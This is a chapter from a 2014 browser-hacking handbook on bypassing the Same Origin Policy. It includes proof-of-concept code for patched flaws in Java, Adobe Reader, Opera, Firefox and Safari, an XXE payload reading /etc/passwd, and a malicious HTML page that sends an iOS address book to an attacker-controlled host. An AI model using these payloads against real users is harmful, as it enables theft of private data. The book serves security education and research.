Bypassing the Same Origin Policy - The Browser Hacker’s Handbook (2014)

The Browser Hacker’s Handbook (2014)

Chapter 4. Bypassing the Same Origin Policy

The Same Origin Policy (SOP) is possibly the most important security control enforced on the web. Unfortunately, it is also one of the most inconsistently implemented specifications. If the SOP is broken, or bypassed, the central security model of the World Wide Web is also broken.

The intention of the SOP is to restrict interaction between interfaces of unrelated origins. The SOP dictates that if the origin http://browserhacker.com wants to access information from http://browservictim.com, it can’t. Of course, depending on which browser is used, or which browser plugin is used, this is not always so simple.

Various SOP bypasses are analyzed in this chapter. Because the SOP is a very critical component in browser security, many of these bypasses will have been patched by the time you read this book. Still, there is a lot to research, and it’s not unusual for a new bypass to be constructed by modifying a previous one.

When you employ an SOP bypass, it’s often possible to use the hooked browser as an HTTP proxy to access origins different from the one initially hooked. Yes, it sounds weird, but you will see how this is actually possible in this chapter.

Understanding the Same Origin Policy

The SOP deems pages having the same hostname, scheme and port as residing at the same-origin. If any of these three attributes varies, the resource is in a different origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction.

The SOP was initially only defined for external resources, but was extended to include other types of origins. This included access to local files using the file scheme and browser-related resources using the chrome scheme.

Let’s consider the following analogy to demonstrate the necessity for this policy. Imagine a hospital. All patients within the hospital initially are admitted from external origins. The hospital may contain many patients at any given time, all unrelated. If any given patient in the hospital makes a request to the hospital staff to receive medical records or the status of other patients, they will be denied (and possibly with repeated aggressive attempts, admitted to another kind of hospital!). Similarly, if random members of the public make requests of the hospital to either visit or inquire about the status of any patients, the hospital will check to ensure they are closely related—of the same family or origin—before allowing access.

Now imagine a hospital that allowed unfettered interaction between its patients, the data it held about the patients and anybody from the outside world as well! This is the browser without the SOP.

Actually, it gets more complicated than that. For example, there is an SOP for XMLHttpRequest, DOM access and cookies. There are even separate SOPs for various plugins like Java, Flash and Silverlight, each demonstrating its own quirks and interpretations. When you consider these variances, you can begin to grasp the difficulty a defender has with trying to secure an origin.

If that wasn’t enough, there are legitimate reasons for web applications to communicate to different origins. Some of these cross-origin communication techniques were explored in Chapter 3, including XHR polling, the WebSocket protocol, window.postMessage() functions and DNS channels. The following sections will explore some more examples of techniques web applications use to communicate cross-origin.

Understanding the SOP with the DOM

When determining how JavaScript and other protocols can access DOM policies, there are three portions of the URL that are compared to determine access — the hostname, the scheme and the port. If two sites contain the same hostname, scheme and port when accessed, then DOM access is granted. The only exception (for DOM access) is Internet Explorer; it only validates hostname and scheme before determining access.

This works well when all scripting is under one origin. However in many cases, there may be another host within the same root domain, which should have access to the source page’s DOM. One example might be a series of sites that use a central authentication server. For instance,store.browservictim.com may need to leverage authentication through login.browservictim.com.

In this case, the sites can use the document.domain property to allow other sites within the same domain to interact with the DOM. To allow the code from login.browservictim.com to interact with the forms on store.browservictim.com the developer would need to set the document.domainproperty to the root of the domain (on both sites):

document.domain = "browservictim.com"

Once this is set in the DOM, the SOP is relaxed to the root of the domain. This means that anything in the browservictim.com domain can access the DOM in the current page. There are a few restrictions to setting these values, however. Once the SOP is relaxed down to the root domain, it can’t be restricted again.

To see this in action, you can try setting the document.domain property to the root of the domain. Then, try to restrict it again. Opening the SOP to include the root domain will be allowed, however when trying to set it back, an error will be generated:

// current domain: store.browservictim.com

document.domain = "browservictim.com"; // Ok

// current domain: browservictim.com

document.domain = "store.browservictim.com"; // Error

Before relaxing the SOP this way, it’s important to make sure the developers understand all of the implications. If this was a production environment, and someone put wikidev.browservictim.com on the Internet, weaknesses in this new site may pose a risk to the store.browservictim.com origin. If an attacker were able to upload malicious code due to unpatched weaknesses, then the wikidev site would have the same level of access as the login site. This could expose information, or lead to XSS, XSRF, or other types of attacks.

Understanding the SOP with CORS

By default, if you use an XMLHttpRequest object (XHR) to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This is a very useful characteristic of cross-origin requests, and will be discussed in Chapters 9 and 10 as part of a number of attack techniques.

The SOP prevents you from reading the HTTP response headers or body. One of the ways to relax the SOP and allow cross-origin communication with XHR is using Cross-origin Resource Sharing (CORS). If the browserhacker.com origin returns the following response headers, then every subdomain of browservictim.com can open a bidirectional communication channel with browserhacker.com:

Access-Control-Allow-Origin: *.browservictim.com

Access-Control-Allow-Methods: OPTIONS, GET, POST

Access-Control-Allow-Headers: X-custom

Access-Control-Allow-Credentials: true

Other than the first self-explanatory HTTP response header, the other headers specify that requests can be made using any of the OPTIONS, GET or POST methods, and eventually including the X-custom header. Note also the Access-Control-Allow-Credentials header, which is responsible for allowing authenticated communication to a resource. This is demonstrated in the following code snippet:

var url = 'http://browserhacker.com/authenticated/user';

var xhr = new XMLHttpRequest()

xhr.open('GET', url, true);

xhr.withCredentials = true;

xhr.onreadystatechange = do_something();

xhr.send();

The preceding example retrieves the /authenticated/user resource. In this instance it required credentials for access. The JavaScript enabled authentication support by setting the withCredentials flag to true.

Understanding the SOP with Plugins

In theory, if a plugin is served from http://browserhacker.com:80/, it should only have access to http://browserhacker.com:80/. In practice, things are not that simple. As you will learn throughout this chapter, there are many SOP implementations in Java, Adobe Reader, Adobe Flash and Silverlight, but most of them are inconsistent and have suffered from different bypasses in the past.

Every major browser plugin implements the SOP in its own way. For instance, some versions of Java consider two different domains to have the same-origin if the IP is the same. This might have devastating results in virtual hosting environments that often host multiple websites from the same IP address.

Adobe has a long history of critical security bugs in its PDF Reader and Flash plugins. Most of those bugs allowed execution of arbitrary code, so the security risk was much higher than a SOP bypass. However, SOP bypasses affected both the plugins too.

Adobe Flash offers a method to allow you to manage cross-origin communication. This is performed through a file named crossdomain.xml, which should exist in the root of the website. The file has content similar to the following:

<?xml version="1.0"?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="by-content-type"/>

<allow-access-from domain="*.browserhacker.com" />

</cross-domain-policy>

With such a policy, every subdomain of browserhacker.com can achieve two-way communication with the application.

Java and Silverlight SOPs can be relaxed in a similar way, because crossdomain.xml is supported by both of these plugins. Silverlight also supports clientaccess-policy.xml. When a cross-origin request is issued, Silverlight first checks for this file, and then if that’s not found, falls back tocrossdomain.xml. Both plugins have their quirks, as you will learn in the following sections.

Understanding the SOP with UI Redressing

UI redressing, in simple terms, is an attack methodology category that changes visual elements in a user interface in order to conceal malicious activities. Overlaying a visible button with an invisible submit button that performs a malicious action, or changing the cursor to move or click independently from where a user actually intends, are both UI redressing attacks. Multiple UI redressing attacks have been successfully exploited in the wild, targeting Facebook and other popular websites, as you will discover later in this chapter.

UI redressing attacks bypass the SOP in different ways. Some of these (now patched) attacks relied on the fact the SOP wasn’t enforced when performing drag&drop actions from the main window to IFrames, between IFrames and between windows. Other attacks rely on the SOP not being enforced under certain conditions while requesting view-source content.

Understanding the SOP with Browser History

Retrieving the browser history can be potentially devastating for the privacy of an end user. While most of the attacks targeting the user’s privacy are covered in Chapter 5, some examples of browser history attacks are covered in this chapter too.

Some of these attacks rely on classic SOP implementation flaws, such as an http scheme having access to other schemes (for example, browser, about or mx). These attacks worked on Avant and Maxthon, two lesser-known browsers that happen to be very popular in China.

Other more sophisticated attacks involve catching SOP violation errors while loading cross-origin resources. These attacks are useful in unveiling sites the browser has visited previously.

Exploring SOP Bypasses

The SOP has been interpreted differently by all kinds of developers. This complexity and varied interpretation will work to your advantage when attacking the browser.

One way to expand your attacking opportunities is by finding a way around the SOP. It will allow you to use the victim browser as a liberal pivot point to launch further attacks, not only to the Internet, but also to intranets and even potentially to the local file system.

The following sections will demonstrate methods in which the SOP can be bypassed through browser plugins, browser quirks, or even through third-party applications. This is in no way an extensive list of every single SOP bypass, but acts as a primer for some of the more common bypasses and methods that have been successful. Once the basics have been covered, additional ways to leverage SOP bypasses will be covered in Chapters 6, 7 and 8.

Bypassing SOP in Java

Java versions 1.7u17 and 1.6u45 don’t enforce the SOP if two domains resolve to the same IP. That is, if browserhacker.com and browservictim.com resolve to the same IP, a Java applet can issue cross-origin requests and read the responses.

Reviewing the Java 6 and 7 documentation, specifically the equals method of the URL object,1 uncovers the following statement: “Two hosts are considered equivalent if both host names can be resolved into the same IP addresses […].” Obviously, this is a vulnerability in Java’s SOP implementation (which was unpatched at the time of writing). The bug is critical when exploited in virtual hosting environments where potentially hundreds of domains are managed by the same server and resolve to the same IP.

Consider the following scenario where www.browserhacker.com and www.browservictim.com resolve to the same IP address 192.168.0.2:

$ cat /etc/hosts/

192.168.0.2 www.browservictim.com

192.168.0.2 www.browserhacker.com

In the following Java applet, when the getInfo() method is called, it creates a new instance of the java.net.URL object, which is used to retrieve content from a specific URL hosted on www.browserhacker.com:

import java.applet.*;

import java.awt.*;

import java.net.*;

import java.util.*;

import java.io.*;

public class javaAppletSop extends Applet{

public javaAppletSop() {

super();

return;

}

public static String getInfo(){

String result = "";

try {

URL url = new URL("http://www.browserhacker.com" +

"/demos/secret_page.html");

BufferedReader in = new BufferedReader(

new InputStreamReader(url.openStream()));

String inputLine;

while ((inputLine = in.readLine()) != null)

result += inputLine;

in.close();

}

catch (Exception exception){

result = "Exception: " + exception.toString();

}

return result;

}

}

Now compile the previous applet and embed it in an HTML page on www.browservictim.com. Next, open the page with Firefox using the Java plugin version 1.6u45 or 1.7u17. You can use the following HTML to embed the applet:

<html>

<!--

Tested on:

- Java 1.7u17 and Firefox (CtP allowed)

- Java 1.6u45 and IE 8

-->

<body>

<embed id='javaAppletSop' code='javaAppletSop'

type='application/x-java-applet'

codebase='http://browservictim.com/' height='0'

width='0'name='javaAppletSop'></embed>

<!-- use the following one for IE -->

<!--

<applet id='javaAppletSop' code='javaAppletSop'

codebase='http://browservictim.com/' height='0'

width='0'name='javaAppletSop'></applet>

-->

<script>

// 5 secs timeout to wait for the user to allow CtP

function getInfo(){

output = document.javaAppletSop.getInfo();

if (output) alert(output);

}

setTimeout(function(){getInfo();},5000);

</script>

</body>

</html>

In the pop-up in Figure 4-1, you can see the content of demos/secret_page.html correctly retrieved from www.browservictim.com, which Java doesn’t consider a different origin from www.browserhacker.com.

Figure 4-1: Unsigned applet is able to retrieve content cross-origin.

image

An important consideration here concerns the privileges required by the applet to use the URL, BufferedReader and InputStreamReader objects. With Java 1.6 a normal unsigned applet is enough, and no user intervention is required to run the applet (except in the latest browser versions where all unsigned applets require user intervention to run). With Java 1.7, the applet will need explicit user permission to run, resulting in a mandatory user intervention to accept its execution by clicking the Run button.

This is due to changes in the applet delivery mechanism implemented by Oracle in Java 1.7 from update 11 in early 2013. Now the user must explicitly use the Click to Play feature to run signed and unsigned applets. The initial implementation of this new feature was bypassed by Immunity2 and led to a subsequent patch by Oracle. Additionally, from Java 7u21, Oracle has updated3 the Click to Play security dialog box to differentiate the message displayed to the user based on the type of applet.

Still, from the end-user perspective, the difference between two signed applets running on Java versions greater than 7u21 where one is sandboxed and one is not, relies on one word.4 If the signed applet is requesting privileges to run outside the sandbox, the message displayed to the user will be “…will run with unrestricted access …”. If the signed applet is sandboxed, the message displayed to the user will be “…will run with restricted access …”. You can clearly see the subtle difference between the messages. The real question here is how many users will notice the difference? Nonetheless, Click to Play effectively nullifies Java as a stealthy SOP bypass option.

Mario Heiderich discovered a Java quirk when the LiveConnect5 API and Java plugin are available in Firefox. LiveConnect makes a Packages DOM object available in Firefox 15 and earlier. This object allows you to call direct to Java objects and methods from the DOM. An example of the bypass using the Packages DOM object is the following:

<script>

var url = new Packages.java.net.URL("http://browservictim.com/cookie.php");

var is = new Packages.java.io.BufferedReader(

new Packages.java.io.InputStreamReader(url.openStream()));

var data = '';

while ((l = is.readLine()) != null) {

data+=l;

}

alert(data)

</script>

When this Java code is called using Packages, there is a potentially dangerous side effect. If the code is executed under Java 1.7 using Firefox 15 or earlier, the previously discussed Click to Play feature is entirely bypassed. If the browser is Firefox, and the LiveConnect API is enabled, the silent nature of this behavior effectively increases the usefulness of Java applets for SOP bypass purposes.

Another interesting SOP bypass bug in Java is CVE-2011-3546, patched after ten months in late 2011. A similar SOP bypass was found in Adobe Reader, and is discussed in the next section. Neal Poole discovered6 that if the resource used to load an applet was replying with a 301 or 302 redirect, the applet’s origin was evaluated as the source of the redirection, and not the destination. Consider the following code:

<applet

code="malicious.class"

archive="http://browservictim.com?redirect_to=

http://browserhacker.com/malicious.jar"

width="100" height="100"></applet>

You would rightly expect the SOP to be enforced if the applet tries to access browservictim.com. Of course, an SOP violation error should be thrown in this situation too. This is how a non-flawed SOP implementation should behave, because the origin of the applet is browserhacker.com. Instead, Java versions 1.7 and 1.6 update 27 (and prior versions) considered the source of the redirection as the valid origin. In practice, this means you could read the content of every origin affected by an Open Redirection vulnerability. The applet would load from the redirection destination (which is an attacker’s controlled website) and the redirection source is the victim’s origin (vulnerable to Open Redirection).

Frederik Braun7 discovered another interesting SOP bypass in Java version 1.7 Update 5 and earlier, which Oracle subsequently addressed in Java 1.7 Update 9. The bypass involved Java’s URL object (that was also used in the previous examples) blacklisting the usage of URI schemes like ftpand file for cross-origin requests. The jar scheme was permitted though, which allowed you to create a perfectly valid URI like:

jar:http://browserhacker.com/secret.jar

These jar URIs could be used when creating a new instance of the URL object. The SOP was not enforced in this case, so an unsigned Java applet loaded from browserhacker.com could request JAR files from different origins, effectively reading the contents.

The impacts of this SOP bypass were not just limited to JAR files. The JAR format is essentially a ZIP file with a Manifest and META-INF directory inside. Microsoft Office and Open Office document formats are the same, which means you can read any docx, odt, jar and generally any archive file based on the zip format using this SOP bypass cross-origin.

The following code can be used to read the contents of an Open Office document using the SOP bypass previously discussed:

import java.awt.*; import java.applet.Applet ;

import java.io.* ; import java.net.*;

public class zipSopBypass extends Applet {

private TextArea ltArea = new TextArea("", 100, 300);

public void init (){

add(ltArea);

}

public void paint (Graphics g) {

g.drawString("Reading file content in JAR...", 80, 80);

// the applet is loaded from

//the http://browserhacker.com origin

String url = "jar:https://browservictim.com/"+

"stuff/confidential.odt!/content.xml";

String content = "";

try{

URL u = new URL(url);

BufferedReader ff = new BufferedReader(

new InputStreamReader(u.openStream())

);

while (ff.ready()){

content += ff.readLine();

}

}catch(Exception e){

g.drawString( "Error",100,100);

}

ltArea.setText(content);

g.drawString(content ,100,100);

}

}

Note that the url variable from the previous code is pointing to the content.xml resource contained inside the odt file archive. In Open Office documents, every file contains a content.xml resource.

Almost all the Java SOP bypasses described in the previous pages have been patched by Oracle. However, according to security companies like WebSense8 and Bit9,9 the majority of enterprises still use old and vulnerable versions of Java. Around July 2013, Bit9 collected Java usage statistics from almost 400 organizations using Bit9’s software reputation service. In total, approximately 1 million enterprise endpoint systems were surveyed. About 80 percent of those systems used Java 6. In those environments, it was still possible to run unsigned applets without user intervention.

The Click to Play security control has been introduced in the latest browsers and in Java itself. You may expect this to stop your ability to employ Java applets in your browser hacking. In fact, although it will slow you down, it won’t necessarily stop you. Don’t forget Internet Explorer 9 and below does not implement Click to Play. Also, according to the Bit9 survey, 93 percent of organizations had multiple versions of Java installed on the same machine. This means there is still plenty of opportunity to use Java during your browser hacking. With systems having multiple versions of Java, you can target the older versions and target browsers that don’t employ the Click to Play control.

Figure 4-2: Java security bug time line from 2012 to mid-2013.

image

The widespread presence of the Java plugin makes it a perfect target for attackers. Eric Romang summarized a time line of Java zero days that led to arbitrary code execution, as displayed in Figure 4-2.10 Whilst these are not SOP bypasses, the time line is suggestive of what you can expect in the future.

Bypassing SOP in Adobe Reader

Adobe Reader is infamous for the number of security bugs that have been found in its browser plugin. There is a seemingly countless number of arbitrary code execution bugs caused by such classical problems as overflows and Use After Free vulnerabilities.11 Attacking Adobe Reader more directly will be covered in the “Attacking PDF Readers” section of Chapter 8, but it’s important to understand how flaws within the plugin can help bypass the SOP.

As you may know, the Adobe Reader PDF parser understands JavaScript.12 This attribute is often used by malware to hide malicious code inside PDFs.

One of these flaws that allowed for the bypassing of the SOP is CVE-2013-0622, discovered by Billy Rios, Federico Lanusse, and Mauro Gentile. The attack (now patched in Adobe Reader versions greater than 11.0.0) was similar to the second SOP bypass discussed previously in the Java section, where exploiting an open redirect would allow a foreign origin to access the origin of the redirect. Similar to this attack, a request that returns a 302 redirect response code is used to exploit the vulnerability. Another interesting aspect of the bug is that the SOP was not enforced when specifying a resource using an XML External Entity (XXE).

Conventional XXE injection involves trying to inject malicious payloads into requests that accept XML input, such as the following:

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "/etc/passwd" >]><foo>&xxe;</foo>

If the XML parser allows external entities, the value of &xxe, is then replaced with the contents of /etc/passwd. The same technique can be used to bypass the SOP. It involves loading (as an external entity) the resource and the server replying with a 302 redirect. The real resource you want to retrieve is the target of the redirection. Consider the following JavaScript code snippet, which is contained in a PDF file:

var xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY> <! ENTITY xxe

SYSTEM \"http://browserhacker.com?redirect=

http%3A%2F%2Fbrowservictim.com%2Fdocument.txt\">]>

<foo>&xxe;</foo>";

var xdoc = XMLData.parse(xml,false);

app.alert(escape(xdoc.foo.value));

When the PDF is loaded, the preceding JavaScript code is executed. A GET request is sent to browserhacker.com, which replies with an HTTP 302 response, redirecting to the value of the redirect parameter. This results in document.txt (from browservictim.com) being retrieved and parsed.

The origin of http://browserhacker.com should not have access to content in the http://browservictim.com origin. This is clearly a security flaw of the Adobe Reader SOP implementation, because only resources from the same-origin where the PDF was loaded from should be read. In this case, you’re reading a resource from a different origin than the one where the PDF was loaded. Exploiting this bug has a limitation, though, which can be generally applied to XXE injection bugs. The resource to be retrieved needs to be either a plain or XML document type; otherwise, the XML parser will throw an error.

Bypassing SOP in Adobe Flash

Adobe Flash utilizes the crossdomain.xml file. As with other applications, this file controls the sites where Flash can receive data. While this file should be restricted to only trusted sites, it is still common to find liberal crossdomain.xml policy files. The following is an example:

<?xml version="1.0"?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="by-content-type"/>

<allow-access-from domain="*" />

</cross-domain-policy>

By setting the allow-access-fromdomain, a Flash object loaded from any origin can send requests and read responses on the domain that serves such a liberal policy.

Ensuring the domain is limited to only trusted hosts is also critically important because it means every hooked browser can achieve two-way communication with the affected application using Flash. Additional attacks are covered in detail in the (proxying the) “Browser through Flash” section of Chapter 9.

Bypassing SOP in Silverlight

Microsoft’s Silverlight plugin uses the same SOP principle as Flash. To achieve the same cross-origin communication, the site would publish a file called clientaccess-policy.xml containing the following:

<?xml version="1.0" encoding="utf-8"?>

<access-policy>

<cross-domain-access>

<policy>

<allow-from>

<domain uri="*"/>

</allow-from>

<grant-to>

<resource path="/" include-subpaths="true"/>

</grant-to>

</policy>

</cross-domain-access>

</access-policy>

It’s important to note the difference between the Flash and Silverlight implementations of cross-origin communication. Silverlight doesn’t segregate access between different origins based on scheme and port, unlike Flash and CORS. As a consequence, Silverlight will considerhttp://browserhacker.com and https://browserhacker.com as the same-origin.13

This introduces a significant issue because it creates a bridge from HTTP to HTTPS. If you can get your malicious content in over HTTP it will then have access to (potentially sensitive) content secured via HTTPS.

Bypassing SOP in Internet Explorer

Internet Explorer hasn’t been without an SOP bypass either. One example is with Internet Explorer versions prior to 8 Beta 2 (including IE 6 and 7). These browser versions were vulnerable to an SOP bypass14 in their implementation of document.domain. The flaw was quite easy to exploit, as demonstrated by Gareth Heyes.15 It consisted of simply overriding the document object and then the domain property.

The following code snippet demonstrates this vulnerability:

var document;

document = {};

document.domain = 'browserhacker.com';

alert(document.domain);

If you try to run this code in the latest browsers, you will notice an SOP violation error in the JavaScript console. However, it will work in the older versions of Internet Explorer. By leveraging this code as part of XSS, you have the ability to open up the SOP to create bi-directional communication with other origins.

Bypassing SOP in Safari

Within the SOP, different schemes are handled as different origins. Therefore http://localhost is treated as a different origin from file://localhost. One would understandably think the SOP is enforced equally across schemes. Well, as you will see in this section, there are a few notable exceptions with the file scheme, which is usually considered to be a privileged zone.

The Safari browser, from 200716 to the current (at the time of this writing) 6.0.2 version, does not enforce the SOP when a local resource is accessed. If you happen to get JavaScript execution within Safari, you can try to trick the user into downloading and opening a local file. Combining this vulnerability with a carefully crafted social-engineering e-mail lure with an attached malicious HTML file will be enough to abuse this situation. When the attached HTML file is opened using the file scheme, the JavaScript code contained within can bypass the SOP and start two-way communications with different origins. Consider the following page:

<html>

<body>

<h1> I'm a local file loaded using the file:// scheme </h1>

<script>

xhr = new XMLHttpRequest();

xhr.onreadystatechange = function (){

if (xhr.readyState == 4) {

alert(xhr.responseText);

}

};

xhr.open("GET",

"http://browserhacker.com/pocs/safari_sop_bypass/different_orig.html");

xhr.send();

</script>

</body>

</html>

When the page is loaded using the file scheme, the XMLHttpRequest object is able to read the response after requesting different_orig.html from browserhacker.com. In Figure 4-3, you can see the result of this behavior, where the content of the retrieved page is added to an alert dialog box.

Figure 4-3: The content from the cross-origin resource is correctly retrieved if the JavaScript code is loaded using the file: scheme.

image

Conversely, if you try to load the same page with a different scheme, for instance http, you will notice that the alert dialog box will be empty.

Bypassing SOP in Firefox

One of the more interesting SOP bypasses in Firefox was discovered by Gareth Heyes in October 2012.17 The bug was so serious that Mozilla decided to remove the ability to download Firefox 16 from their servers until the bug was fixed.18 As previous versions were not vulnerable, it’s assumed that the bug was introduced as part of the upgrade, but was not detected through regression testing in Firefox 16. The flaw resulted in unauthorized access to the window.location object outside the constraints of the SOP. Here is the original Proof of Concept (PoC)from Heyes:

<!doctype html>

<script>

function poc() {

var win = window.open('https://twitter.com/lists/', 'newWin',

'width=200,height=200');

setTimeout(function(){

alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(

win.location)[1])

}, 5000);

}

</script>

<input type=button value="Firefox knows" onclick="poc()">

Executing the previous code from an origin you control (for example, browserhacker.com) while also authenticat into Twitter on a different tab will launch the attack. It will open a new window that loads https://twitter.com/lists. Twitter then automatically redirects tohttps://twitter.com/<user_uid>/lists(where user_id is your Twitter handle). After 5 seconds, the exec function will trigger the window.location object to be parsed (here’s the bug, as it shouldn’t be accessible cross-origin) with the regex. This results in the Twitter handle displayed in the alertbox.

Sandboxed IFrames

With HTML5, a new IFrame attribute was introduced: sandbox. The aim of this new attribute was to have a more granular and secure way to use IFrames, while limiting the potential harm of third party content embedded from different origins.

The sandbox attribute value can be zero or more of the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts and allow-top-navigation.

Around August 2012, Firefox introduced support for HTML5 sandboxed IFrames. Braun discovered that when using allow-scripts as the value of the IFrame sandbox attribute, rogue JavaScript from the IFrame content could still access window.top. This resulted in the possibility of changing the outer window location:

<!-- Outer file, bearing the sandbox -->

<iframe src="inner.html" sandbox="allow-scripts"></iframe>

The framed code was:

<!-- Framed document , inner.html -->

<script >

// escape sandbox:

if(top != window) { top.location = window.location; }

// all following JavaScript code and markup is unrestricted:

// plugins, popups and forms allowed.

</script>

This was possible without the need to specify the additional keyword allow-top-navigation, and allowed JavaScript code loaded inside an IFrame to change the location of the outer window. An attacker could use this to redirect the user to a malicious website, effectively hooking the victim browser.

Bypassing SOP in Opera

If you look at Opera’s change logs19 for the stable release version 12.10, you will notice various security bug fixes. One of these patches20 is an SOP bypass discovered by Heyes.21 The bug relies on the fact that Opera was not properly enforcing the SOP when overriding prototypes, in this case when overriding the constructor of an IFrame location object. Consider the following code:

<html>

<body>

<iframe id="ifr" src="http://browservictim.com/xdomain.html"></iframe>

<script>

var iframe = document.getElementById('ifr');

function do_something(){

var iframe = document.getElementById('ifr');

iframe.contentWindow.location.constructor.

prototype.__defineGetter__.constructor('[].constructor.

prototype.join=function(){console.log("pwned")}')();

}

setTimeout("do_something()",3000);

</script>

</body>

</html>

Following is the content framed from a different origin:

<html>

<body>

<b>I will be framed from a different origin</b>

<script>

function do_join(){

[1,2,3].join();

console.log("join() after prototype override: "

+ [].constructor.prototype.join);

}

console.log("join() after prototype override: "

+ [].constructor.prototype.join);

setTimeout("do_join();", 5000);

</script>

</body>

</html>

The framed code is printing to the console the value of [].constructor.prototype.join, which is the native code used when join() is called on an array. After 5 seconds, the join() method is called on the [1,2,3] array, and the printing function used previously is called again. The second call shows the difference, after the join() prototype has been overridden. If you have a look back at the first snippet of code, you can see where the join() prototype gets overridden inside the do_something() function. Let’s focus again on the following code from the first code snippet:

iframe.contentWindow.location.constructor.

prototype.__defineGetter__.constructor('[].constructor.

prototype.join=function(){console.log("pwned")}')();

Note that you can call iframe.contentWindow.location.constructor without any SOP violation errors. This is a broken behavior, because the SOP should be enforced. Chrome, for instance, would throw an SOP violation error, as shown in Figure 4-4.

Figure 4-4: Chrome SOP violation error when trying to access the constructor

image

Going a step further, you want to check if you can actually execute code after prototype overriding is done. In Figure 4-5 you can see that you can execute code, for instance return 5+20, but the available actions are limited. Even the alert() function cannot be used and generates a security error.

Figure 4-5: Security error when trying to perform restricted actions

image

Heyes also discovered an SOP bypass by overriding prototypes using literal values, which were not filtered by Opera. Taking the array literal value of [], and doing prototype overriding on the join() method with the following instructions, it’s possible to execute arbitrary code each time the framed content calls the join() method on any array:

[].constructor.prototype.join=function(){your_code};

To show the SOP bypass in action, get the code from https://browserhacker.com. Then host the two code snippets on two different origins, and open the Opera 12.02 console. The console output will be the same as Figure 4-6.

Figure 4-6: Overriding the join() function in Opera

image

There is a prerequisite for using this bypass: only frameable websites can be targeted. Therefore, origins that use X-Frame-Options or frame-busting code are out of the scope of this SOP bypass. Another consideration worth mentioning is that you can override any prototypes using literal values, not only the Array.join() method. You can override, for instance, toString() in the following way:

"".constructor.prototype.toString=function(){alert(1)}

In a real attack you might want to frame a resource, possibly an authenticated one where session cookies are already stored in the browser, and use this SOP bypass to read the content of the framed resource. The framed resource will mostly contain private data of the user, because the valid session cookies are used when loading the resource.

Consider a situation where the target browser has two tabs open in Opera: one of them is the hooked tab (you control) and the second one is the target’s authenticated origin. If you create an IFrame with the src being the authenticated origin (in the hooked tab), you can read the IFrame’s content. This means you will be able to access any sensitive information that resides in the target’s authenticated origin.

The result of such an attack would be reading the content of a cross-origin resource and effectively bypassing the SOP.

Bypassing SOP in Cloud Storage

Issues with enforcing the SOP aren’t just limited to browsers and their plugins. In 2012 a number of cloud storage services were also found to have SOP bypass weaknesses. This included Dropbox 1.4.6 on iOS and 2.0.1 on Android22 and Google Drive 1.0.1 on iOS.23 These services enable the storage and synchronization of local files to the cloud. This is in order to have them available anywhere on other devices where Dropbox or Google Drive clients are installed.

Roi Saltzman discovered a bug similar to the Safari SOP bypass covered in the previous section. This bug impacted both Dropbox and Google Drive. The attack relies on the loading of a file in a privileged zone, such as:

file:///var/mobile/Applications/APP_UUID

If you are able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. The fact that the file is loaded in a privileged zone allows JavaScript access to the local file system of the mobile device. Note that enforcing the SOP here is flawed by design. Because the malicious HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file such as:

file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb

This SQLite database contains the user’s address book on iOS. Of course, this file must be accessible by the application. If the target application denies file access outside of the application scope, you can still retrieve cached files, etc. Access resulting from this kind of vulnerability will be largely dependent on the vulnerable application.

If you trick a target that uses either the vulnerable Dropbox or Google Drive clients into opening the following malicious file, the contents of the user’s address book will be sent to browserhacker.com:

<html>

<body>

<script>

local_xhr = new XMLHttpRequest();

local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/

AddressBook.sqlitedb");

local_xhr.send();

local_xhr.onreadystatechange = function () {

if (local_xhr.readyState == 4) {

remote_xhr = new XMLHttpRequest();

remote_xhr.onreadystatechange = function () {};

remote_xhr.open("GET", "http://browserhacker.com/?f=" +

encodeURI(local_xhr.responseText));

remote_xhr.send();

}

}

</script>

</body>

</html>

This attack demonstrates a few different exploitation methods available through the use of well-planted JavaScript. JavaScript is often run in a number of different environments and contexts, not just web browsers. In the instance of the iOS attack, the exploit ran inside a UIWebView object within the Dropbox or Google application. A UIWebView object is often used as a form of embedded browser window within native iOS applications.

Another notable point about this attack is that it targeted mobile OSes, not traditional desktop environments. Due to the size constraints of the visible UI, these sorts of tasks may often occur without the target even being aware.

Bypassing SOP in CORS

While Cross-origin Resource Sharing (CORS) is a great way to relax the SOP, it’s easy to misconfigure without fully understanding the security impact of a relaxed policy. The following is an example of a potential misconfiguration:

Access-Control-Allow-Origin: *

In November 2012, Veracode performed research analyzing the HTTP headers from Alexa’s top one million sites.24 More than 2000 unique origins returned a wildcard value on the Access-Control-Allow-Origin header. This effectively allows any other site on the Internet to submit cross-origin requests to the sites and read the response. In practice, this means that the attacker has the equivalent of an SOP bypass for all these domains. Depending on the web application functionality, the results of this configuration could well be catastrophic. From a hooked browser on a different origin, these origins could be spidered and attacked in a much more reliable way than in a situation where the SOP is enforced.

Obviously there might be cases where a wildcard value for the Access-Control-Allow-Origin isn’t insecure. For instance, if a permissive policy is only used to provide content that doesn’t contain sensitive information.

When analyzing an application that sets CORS headers, it’s always important that you understand the relation between the allowed origins. This is even the case if a wildcard value is not used. Multiple origins might be allowed to connect to the same target. So a standard XSS vulnerability on those allowed origins might be enough for you to abuse the target functionality cross-origin.

All these SOP bypass examples are provided as conceptual illustrations—it is by no means considered an exhaustive list. Other vectors could be described here and certainly many others are still to be made public. We encourage you to think about the relationship between the different varieties, and on the shared aspects they leverage. SOP bypasses relying on 301 or 302 redirects, together with schemes such as file, will almost certainly be common in new SOP enforcement bugs that will be discovered in the future.

Exploiting SOP Bypasses

Now that you have a good understanding of the SOP and multiple examples of SOP bypasses, it’s time to take a look at some practical attacks.

You will learn how it’s possible to use some of the SOP bypasses presented in the previous pages to employ the hooked browser as an HTTP proxy. This can even be done in the face of numerous web application security controls such as defensive cookie flags and concurrent session prevention.

Multiple UI redressing attacks will also be presented in this section. Some of these rely on SOP bypasses and others simply work because the SOP wasn’t initially designed to address such issues.

Proxying Requests

